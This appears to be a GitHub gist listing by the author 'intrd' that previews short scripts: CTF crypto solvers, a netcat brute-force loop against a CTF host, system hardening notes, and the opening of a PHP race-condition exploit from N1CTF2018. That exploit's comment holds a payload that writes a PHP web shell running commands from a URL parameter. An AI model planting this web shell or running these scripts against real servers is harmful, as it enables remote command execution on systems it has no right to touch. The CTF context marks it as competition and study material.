This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Kali light xfce4 root autologin (works after lightdm update) | |
# @author intrd - http://dann.com.br/ | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
Root autologin is broken after lighdtdm update, fix by doing this: | |
nano /etc/lightdm/lightdm.conf | |
at [Seat:*] group uncomment/edit: | |
autologin-user=root | |
autologin-user-timeout=0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
## OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017 | |
# @author intrd - http://dann.com.br/ | |
# Original code by jwomers: https://github.com/Jwomers/many-time-pad-attack/blob/master/attack.py) | |
import string | |
import collections | |
import sets, sys | |
# 11 unknown ciphertexts (in hex format), all encrpyted with the same key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
## Math bot script - prog100-math_bot @ alexctf 2017 | |
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e) | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a | |
import re, sys, string, time | |
sys.path.append("../../LIBS/") | |
from int_netcat import Netcat |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
## IPtables - Rulescript to allow only brazilian ip's | |
# @author intrd - http://dann.com.br/ | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
# Brazil | |
ipset -F br.zone | |
ipset -N br.zone nethash | |
for IP in $(wget -O - http://www.ipdeny.com/ipblocks/data/countries/br.zone) | |
do ipset -A br.zone $IP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt) | |
# @author intrd - http://dann.com.br/ | |
Why not full disk encryption? | |
this setup is for systems who need performace.. | |
experienced on ubuntu system w/ an existing user.. | |
as root: | |
# apt-get install ecryptfs-utils cryptsetup | |
# apt-get install lsof |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017 | |
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e) | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
import binascii, base64 | |
p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9 | |
q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307 | |
e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
## Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16 | |
# @author intrd - http://dann.com.br/ | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
for letter in {A..Z} ; do | |
echo $letter | |
sleep 1 | |
(echo "yes" & sleep 1 & echo "$letter") | nc -i1 -w5 54.175.35.248 8002 | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
## Openvpn safe kill switch / isolate vpn connection using linux routing table (no iptables needed) | |
# Author: intrd@dann.com.br | |
# flush the entire routing table (incl cache) | |
sudo ip route flush table main | |
sudo ip route flush cache | |
# route the wan network but not a gateway |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit | |
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
## passwords.txt payload content | |
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?> | |
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re | |
from subprocess import Popen, PIPE, STDOUT |
NewerOlder